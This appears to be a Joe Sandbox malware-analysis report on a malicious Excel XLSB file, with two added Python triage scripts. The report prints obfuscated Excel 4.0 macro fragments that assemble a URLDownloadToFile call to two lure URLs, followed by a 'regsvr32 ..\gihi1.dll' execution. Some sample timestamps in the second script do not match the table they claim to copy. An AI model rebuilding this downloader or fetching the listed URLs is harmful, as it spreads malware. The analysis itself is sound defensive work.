                                                                                                                                                              Entropy (8bit):0.011582753180433458
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:WlWUqt/vllXl+YZcFTS9gXeF+X32ZpbYtfhZ8hZy+FAv73A/Ol9qnErqDlblthtg:idq2Vg3F+X322ChMQAjQObV66DTyi8G
                                                                                                                                                              MD5:593AD3F06697E915B547987B0E753705
                                                                                                                                                              SHA1:A855AC5D2979AA4782D21B0E8F731AB4ACC56E30
                                                                                                                                                              SHA-256:E2A91304AE5407AE1FC1FD8E4D670543F4191B4A858E4DB13516FFDA1239B421
                                                                                                                                                              SHA-512:39B85662AA13A582987668954A6F8A14755357F00648406282CD8E2DEBB7045E109DBF4E77EB646D7684F4E2657A11F7D9FC64FAA262B4E5E12D331E210BD815
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\gihi2.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):302521
                                                                                                                                                              Entropy (8bit):0.011582436694389499
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:WlWUqt/vllXl+YZcFTS9gXeF+X32ZpbYtfhZ8hZy+FAv73A/Ol9qnErqDlblthtg:idq2Vg3F+X322ChMQAjQObV66DTyi8G
                                                                                                                                                              MD5:57692E0E3077E0016A5038DD174CFD4C
                                                                                                                                                              SHA1:B999DB831EB947D8CAABFDBB00F6BA1CFEFE3697
                                                                                                                                                              SHA-256:B737EBBBF7E6380296E2DF93A6545C528B9B63579124D16EBDB630BC9085F391
                                                                                                                                                              SHA-512:ABB81617B8D80BAFFCE47B1033CD625C3252A427BDE374FE6B01B4EE5B0CA8BB996F8B16BB99E800314BDEF575E046C01D033C57A113E4C5AE7F7F8DC343606E
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
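Two details in the records above deserve a second look during triage. The two `ka[1].htm` cache entries were fetched from URLs ending in `ka.html` but carry a PE32 DLL (the preview starts with `MZ`), so the extension and the real content disagree. The copies explorer.exe wrote to `C:\Users\user\gihi1.dll` and `gihi2.dll` have the same sizes (302512 and 302521 bytes) and the same header preview as the downloads, yet an 8-bit entropy of about 0.0116, which for a 300 KB file means the body is almost entirely zero bytes. The following script is an added example, not part of the Joe Sandbox report: it recomputes the per-file fields the report prints (type by magic bytes, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512) and raises a flag for each of those two conditions. The sample inputs are constructed in the script and only borrow the report's file names; they are not the real dropped files.

```python
"""Added triage helper (example, not Joe Sandbox code): recompute the fields of a
dropped-files record and flag extension/content mismatches and hollow PE images.
All sample data below is constructed here, not taken from the report."""
import hashlib
import math
import os
from collections import Counter

# Magic-byte signatures for the content types that occur in the dropped-files list.
MAGICS = (
    (b"MZ", "PE executable"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"PK\x03\x04", "ZIP container"),
    (b"<?xml", "XML document"),
    (b"\xff\xfe", "UTF-16LE text"),
)

# Content types that are plausible for a given extension; anything else is a mismatch.
EXPECTED = {
    ".htm": {"XML document", "text"},
    ".html": {"XML document", "text"},
    ".png": {"PNG image"},
    ".dll": {"PE executable"},
    ".exe": {"PE executable"},
    ".xlsb": {"ZIP container"},
    ".dic": {"UTF-16LE text", "text"},
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the measure the
    report prints as 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def identify(data: bytes) -> str:
    """Classify by leading magic bytes; fall back to 'text' for printable ASCII."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    head = data[:512]
    if head and all(32 <= b < 127 or b in b"\r\n\t" for b in head):
        return "text"
    return "unknown"


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {alg: hashlib.new(alg, data).hexdigest().upper()
            for alg in ("md5", "sha1", "sha256", "sha512")}


def triage(path: str, data: bytes) -> dict:
    """Build one dropped-file record plus a list of analyst flags."""
    kind = identify(data)
    ext = os.path.splitext(path)[1].lower()
    entropy = shannon_entropy(data)
    flags = []
    if ext in EXPECTED and kind not in EXPECTED[ext]:
        flags.append(f"extension {ext} does not match content type {kind}")
    if kind == "PE executable" and entropy < 1.0:
        flags.append("PE header with near-zero entropy: body is almost entirely zero bytes")
    if entropy > 7.5:
        flags.append("high entropy: compressed, packed or encrypted content")
    return {"path": path, "type": kind, "size": len(data),
            "entropy": round(entropy, 4), "flags": flags, **digests(data)}


# Constructed samples (hypothetical content, file names borrowed from the report):
# a DLL served under an .htm name, the same header followed by zero padding, a tiny PNG.
PE_HEADER = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + bytes(range(256)) * 2
SAMPLES = {
    r"INetCache\IE\2WF3MMUU\ka[1].htm": PE_HEADER + bytes(range(64)) * 1600,
    r"C:\Users\user\gihi1.dll": PE_HEADER + b"\x00" * 302000,
    r"Content.MSO\7716717F.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 64,
}


def triage_all(samples=SAMPLES) -> list:
    """Run triage over every sample and return the records."""
    return [triage(p, d) for p, d in samples.items()]


if __name__ == "__main__":
    for rec in triage_all():
        print(f"{rec['path']}: {rec['type']}, {rec['size']} bytes, "
              f"entropy {rec['entropy']}, md5 {rec['md5']}")
        for flag in rec["flags"]:
            print("   !", flag)
```

Point `triage()` at a real dropped file (`triage(path, open(path, "rb").read())`) and compare the four digests and the entropy with the values in the report before trusting either; a PE record whose hashes no longer match the download but whose entropy is close to zero should be treated as an incomplete or hollow copy, not as the payload itself.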

Static File Info

General

File type: Microsoft Excel 2007+
Entropy (8bit): 7.836349486539577
TrID:
• Excel Microsoft Office Binary workbook document (47504/1) 49.74%
• Excel Microsoft Office Open XML Format document (40004/1) 41.89%
• ZIP compressed archive (8000/1) 8.38%
File name: plan-1053707320.xlsb
File size: 90078
MD5: 4854b4dcfa441032f2f54bf2834e894f
SHA1: fa24422834d0f6ce6d3e35a8b0f15a906cdf9823
SHA256: 68741c1f5df351dc186805c2c30a79653fd52ce21e2fb2aa34ff0687120343cf
SHA512: a51e5f92409f4f5dc564c26b2b95659865ae56cf643ea5bb846cbac56a760374aa16cdb7972819e2a3c816632c2e1834ea65be2848f0a8140ac67eb119125a87
SSDEEP: 1536:OlHoxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncjv0/Ci:WDbr0o45GUgHhX8jC9ySa
                                                                                                                                                              File Content Preview:PK..........!..#..............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "plan-1053707320.xlsb"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

Non-empty cells of the macro sheet, in export order (the CSV export does not preserve cell positions):

• ..\gihi1.dll
• ..\gihi2.dll
• ="https://carpascapital.com/gBPg8MtsGbv/ka.html"
• ="https://gruasphenbogota.com/C74hwGGxi/ka.html"
• JJ
• URLDow
• CC
• nload
• BB
• =FORMULA(before.2.0.0.sheet!BG27&before.2.0.0.sheet!BG28&before.2.0.0.sheet!BG29,before.2.0.0.sheet!BL47)
• To
• =FORMULA(before.2.0.0.sheet!BG11&before.2.0.0.sheet!BG12&before.2.0.0.sheet!BG13&before.2.0.0.sheet!BG14&before.2.0.0.sheet!BG15,before.2.0.0.sheet!BL48)
• Fil
• =RIGHT("rsthYFGIPUYiugeA",2)
• =
• =
• =FORMULA.ARRAY(BH10&BH11&BH12,before.2.0.0.sheet!BL49)
• CALL
• =FORMULA.ARRAY(BG33&BG34&BG35&BG36&BG37&BG38&BG39&"2 ",before.2.0.0.sheet!BO52)
• =FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG5&BH34&BH37&BH34&BG2&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ47)
• URL
• =FORMULA(BH19&BH20&BH33&before.2.0.0.sheet!BL47&BH34&BH37&BH34&before.2.0.0.sheet!BL48&BH34&BH37&BH34&before.2.0.0.sheet!BL49&BH34&BH37&BH39&BH37&BH34&BG6&BH34&BH37&BH34&BG3&BH34&BH37&BH39&BH37&BH39&BH36,before.2.0.0.sheet!BJ48)
• M
• on
• =FORMULA(BI32&BI33&BI34&BI35,BL50)
• 0
• ")
• E
• =FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG2&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ49)
• ("
• ("
• X
• =FORMULA(BG19&BL50&before.2.0.0.sheet!BO52&before.2.0.0.sheet!BG3&before.2.0.0.sheet!BH32,before.2.0.0.sheet!BJ50)
• r
• "
• E
• e
• &
• C
• g
• )
• s
• ,

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                                                              Jun 24, 2021 20:52:00.415061951 CEST49739443192.168.2.450.116.92.246
                                                                                                                                                              Jun 24, 2021 20:52:00.415092945 CEST4434973950.116.92.246192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 24, 2021 20:51:43.108686924 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:43.164299965 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:43.291013956 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:43.339402914 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:44.854713917 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:44.905534983 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:45.962810993 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:46.008990049 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:47.614975929 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:47.678334951 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:48.845629930 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:48.894089937 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:53.948920965 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:53.994982958 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:55.259759903 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:55.312151909 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:55.549280882 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:55.644603968 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:56.056659937 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:56.138300896 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:57.124969006 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:57.188456059 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:58.166435957 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:58.252995968 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:59.018085957 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:59.214350939 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:51:59.314043045 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:51:59.363338947 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:00.163207054 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:00.226448059 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:00.521651983 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:00.571331024 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:00.620779991 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:00.675678015 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:01.676764965 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:01.723256111 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:02.776541948 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:02.831732988 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:03.920672894 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:03.975586891 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:04.210329056 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:04.274136066 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:05.052500963 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:05.107897043 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:08.568717957 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:08.614689112 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:11.673342943 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:11.728395939 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:13.500967026 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:13.566433907 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:13.943001032 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:14.002213001 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:15.081157923 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:15.127470016 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:17.645714998 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:17.709813118 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:25.519717932 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:25.575562954 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:35.439935923 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:35.574704885 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:36.154279947 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:36.307291031 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:36.526988029 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:36.591212988 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:37.024379015 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:37.081214905 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:37.154571056 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:37.221306086 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:37.553111076 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:37.608648062 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:38.189977884 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:38.244735956 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:38.873672009 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:38.931441069 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:39.408198118 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:39.466008902 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:40.268268108 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:40.323247910 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:41.300545931 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:41.358247042 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:41.868838072 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:41.924665928 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:49.985790968 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:50.041017056 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:50.069133997 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:50.133117914 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:52:55.500143051 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:52:55.564327002 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:53:24.710867882 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:53:24.774205923 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:53:26.160170078 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:53:26.217027903 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:54:10.313337088 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:54:10.390286922 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Jun 24, 2021 20:54:10.929649115 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Jun 24, 2021 20:54:10.976474047 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 24, 2021 20:51:59.018085957 CEST | 192.168.2.4 | 8.8.8.8 | 0x2b13 | Standard query (0) | carpascapital.com | A (IP address) | IN (0x0001)
Jun 24, 2021 20:52:00.620779991 CEST | 192.168.2.4 | 8.8.8.8 | 0xaad0 | Standard query (0) | gruasphenbogota.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 24, 2021 20:51:59.214350939 CEST | 8.8.8.8 | 192.168.2.4 | 0x2b13 | No error (0) | carpascapital.com | | 50.116.92.246 | A (IP address) | IN (0x0001)
Jun 24, 2021 20:52:00.675678015 CEST | 8.8.8.8 | 192.168.2.4 | 0xaad0 | No error (0) | gruasphenbogota.com | | 50.116.92.246 | A (IP address) | IN (0x0001)
Jun 24, 2021 20:54:10.390286922 CEST | 8.8.8.8 | 192.168.2.4 | 0xe13a | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jun 24, 2021 20:51:59.543297052 CEST | 50.116.92.246 | 443 | 192.168.2.4 | 49739 | CN=*.carpascapital.com | CN=R3, O=Let's Encrypt, C=US | Fri May 21 05:30:14 CEST 2021 | Thu Aug 19 05:30:14 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
    chain: CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
    chain: CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024
Jun 24, 2021 20:52:00.996279955 CEST | 50.116.92.246 | 443 | 192.168.2.4 | 49742 | CN=gruasphenbogota.com | CN=R3, O=Let's Encrypt, C=US | Mon May 10 05:47:53 CEST 2021 | Sun Aug 08 05:47:53 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
    chain: CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025
    chain: CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024
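
The network tables above are what an analyst pivots on: two lure domains (carpascapital.com, gruasphenbogota.com) resolve to the same host, 50.116.92.246, and both TLS sessions carry the same JA3 client digest. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It recovers the fields from rows in the glued "CEST<ports><IPs>" form that the HTML export produced, joins the DNS query and answer rows on the transaction ID to group names by resolved address, and recomputes the JA3 digest from the fingerprint string (JA3 is MD5 over that string) so it can be checked against the digest column. Sample rows are copied from the tables in this section; the parsing assumptions are mine: the analysis VM is 192.168.2.4, its client ports are in the Windows ephemeral range 49152-65535, and the far side of every flow here is port 53 or 443.

```python
"""Recover the fields of this report's flattened packet rows and pivot on them.

Added example, not part of the Joe Sandbox report. Sample rows are copied from
the tables in this section; the parsing assumptions are mine: the analysis VM
is 192.168.2.4, its client ports are in the Windows ephemeral range
49152-65535, and the far side of every flow here is port 53 or 443.
"""
import hashlib
import re
from collections import defaultdict

LOCAL_IP = "192.168.2.4"            # sandbox VM address seen in every row above
SERVICE_PORTS = {53, 443}           # the only server-side ports in this section
EPHEMERAL = range(49152, 65536)     # Windows dynamic client port range (assumption)

# Constructed from rows above: the export glued src port, dst port, src IP and
# dst IP together, so "5172653192.168.2.48.8.8.8" is 51726|53|192.168.2.4|8.8.8.8.
FLATTENED_ROWS = [
    "Jun 24, 2021 20:51:59.018085957 CEST5172653192.168.2.48.8.8.8",
    "Jun 24, 2021 20:51:59.214350939 CEST53517268.8.8.8192.168.2.4",
    "Jun 24, 2021 20:52:00.413376093 CEST49739443192.168.2.450.116.92.246",
    "Jun 24, 2021 20:52:00.413404942 CEST4434973950.116.92.246192.168.2.4",
]
# Timezone is letters only; \w would swallow the port digits that follow it.
_ROW = re.compile(r"^(?P<ts>\w{3} \d{2}, \d{4} [\d:.]+ [A-Z]+)(?P<blob>\d[\d.]*)$")

def _port(s):
    return s.isdigit() and s[0] != "0" and 1 <= int(s) <= 65535

def _octet(o):
    return o.isdigit() and (o == "0" or o[0] != "0") and int(o) <= 255

def parse_row(row, local_ip=LOCAL_IP):
    """Return (timestamp, src_port, dst_port, src_ip, dst_ip) for one glued row.
    The digits are ambiguous on their own ("192.168.2.450.116.92.246" also reads
    as 192.168.2.45 / 0.116.92.246), so every split is tried and kept only if the
    VM end uses an ephemeral port and the far end a service port."""
    m = _ROW.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row}")
    ts, blob = m.group("ts"), m.group("blob")
    head, *rest = blob.split(".")        # head = both ports + first octet of src IP
    if len(rest) != 6:                   # two dotted quads share one middle chunk
        raise ValueError(f"unexpected shape: {row}")
    found = set()
    for o1 in range(1, 4):               # first octet may be 1-3 digits long
        ports, first, mid = head[:-o1], head[-o1:], rest[2]
        for cut in range(1, len(mid)):   # mid = last octet of src + first of dst
            a = [first, rest[0], rest[1], mid[:cut]]
            b = [mid[cut:], rest[3], rest[4], rest[5]]
            if not all(_octet(o) for o in a + b):
                continue
            src_ip, dst_ip = ".".join(a), ".".join(b)
            if local_ip not in (src_ip, dst_ip) or src_ip == dst_ip:
                continue
            for k in range(1, len(ports)):
                sp, dp = ports[:k], ports[k:]
                if not (_port(sp) and _port(dp)):
                    continue
                sp, dp = int(sp), int(dp)
                client, server = (sp, dp) if src_ip == local_ip else (dp, sp)
                if client in EPHEMERAL and server in SERVICE_PORTS:
                    found.add((ts, sp, dp, src_ip, dst_ip))
    if len(found) != 1:
        raise ValueError(f"{len(found)} readings for row: {row}")
    return found.pop()

# DNS Queries / DNS Answers rows from this section: (time, txid, name[, cname, addr]).
DNS_QUERIES = [("20:51:59.018085957", 0x2B13, "carpascapital.com"),
               ("20:52:00.620779991", 0xAAD0, "gruasphenbogota.com")]
DNS_ANSWERS = [("20:51:59.214350939", 0x2B13, "carpascapital.com", "", "50.116.92.246"),
               ("20:52:00.675678015", 0xAAD0, "gruasphenbogota.com", "", "50.116.92.246"),
               ("20:54:10.390286922", 0xE13A, "prda.aadg.msidentity.com",
                "www.tm.a.prd.aadg.trafficmanager.net", "")]

def pivot_by_address(queries, answers):
    """Join answers to queries on the transaction ID and group names by address.
    Answers with no query in the table (the Microsoft identity CNAME, which has
    no query row above) are returned separately rather than mixed into the pivot."""
    asked = {txid for _, txid, _ in queries}
    by_addr, unmatched = defaultdict(set), []
    for _, txid, name, cname, addr in answers:
        if txid not in asked:
            unmatched.append((txid, name, cname))
        elif addr:
            by_addr[addr].add(name)
    return dict(by_addr), unmatched

JA3_FINGERPRINT = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161"
                   "-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")

def ja3_digest(fingerprint):
    """JA3 is MD5 over the comma-separated fingerprint string; compare the result
    with the 'JA3 SSL Client Digest' column of the HTTPS table."""
    return hashlib.md5(fingerprint.encode()).hexdigest()

if __name__ == "__main__":
    for row in FLATTENED_ROWS:
        print(parse_row(row))
    by_addr, unmatched = pivot_by_address(DNS_QUERIES, DNS_ANSWERS)
    print(by_addr, unmatched)            # two lure domains, one server: pivot on the IP
    print("JA3 digest:", ja3_digest(JA3_FINGERPRINT))
```

Because the exported digits carry no separators, `parse_row` refuses a row rather than guessing when more than one split survives the port and address constraints; if you reuse it on a report whose VM sits at a different address or talks to other service ports, change `LOCAL_IP` and `SERVICE_PORTS` first. The pivot makes the infrastructure overlap explicit, and the same ephemeral port reappearing in the UDP table (53700 is reused across five queries) is worth keeping in mind when tying a DNS query row to the packet that carried it.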

                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              System Behavior

General

Start time: 20:51:53
Start date: 24/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xc70000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                              General

                                                                                                                                                              Start time:20:52:01
                                                                                                                                                              Start date:24/06/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:regsvr32 ..\gihi1.dll
                                                                                                                                                              Imagebase:0x13b0000
